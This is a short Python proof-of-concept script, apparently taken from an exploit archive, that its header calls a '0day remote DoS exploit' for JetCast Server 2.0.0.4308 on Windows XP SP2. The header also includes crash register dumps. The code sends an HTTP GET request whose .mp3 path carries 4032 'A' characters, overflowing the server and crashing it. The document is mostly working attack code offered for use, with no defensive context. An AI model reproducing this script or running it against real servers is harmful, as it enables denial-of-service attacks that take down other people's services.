#!/usr/bin/python """ ____ __ __/ ___|___ _ __ ___ \ \ / / | / _ \| '__/ _ \ \ V /| |__| (_) | | | __/ \_/ \____\___/|_| \___| _ _ __ _ __ ___ ___ ___ _ __ | |_ ___ _ | '_ \| '__/ _ \/ __|/ _ \ '_ \| __/ __| |_| | |_) | | | __/\__ \ __/ | | | |_\__ \ _ | .__/|_| \___||___/\___|_| |_|\__|___/ |_| |_| _ _ // \\// GENRE: //\\PLOIT // ` PROGRAM: JetCast Server 2.0.0.4308 EXPLOiT TYPE: 0day remote DoS exploit EXPLOiT LANGUAGE: Python DEBUG iNFO: [Module JSMP3OGG] EAX 100355B8 JSMP3OGG.100355B8 ECX 00000007 EDX 00002000 EBX 00CB415A ESP 00DCDEC0 EBP 00DCDECC ESI 00000000 EDI 1002FA64 ASCII "Mozilla" EIP 1002737C JSMP3OGG.1002737C MOV AH,BYTE PTR DS:[ESI]; C0000005 (ACCESS VIOLATION) Bug found / exploit written by vCore Tested on JetCast Server 2.0.0.4308 - Windows XP ServicePack2 ____ _ / ___|_ __| | ___ _ | | / _ \ / _` |/ _ \ |_| | |__| (_) | (_| | __/ _ \____\___/ \__,_|\___| |_| """ from time import sleep from socket import * target = '127.0.0.1' port = 8000 buf = "A" * 4032 header = ( 'GET /%s.mp3 HTTP/1.0\r\n' 'Host: %s\r\n' 'User-Agent: WinampMPEG/5.19\r\n' 'Accept: */*\r\n' 'Icy-MetaData:1\r\n' 'Connection: close\r\n') % (buf, target) s = socket(AF_INET, SOCK_STREAM) s.connect((target, port)) s.send(header) sleep(2) s.close() print "DONE"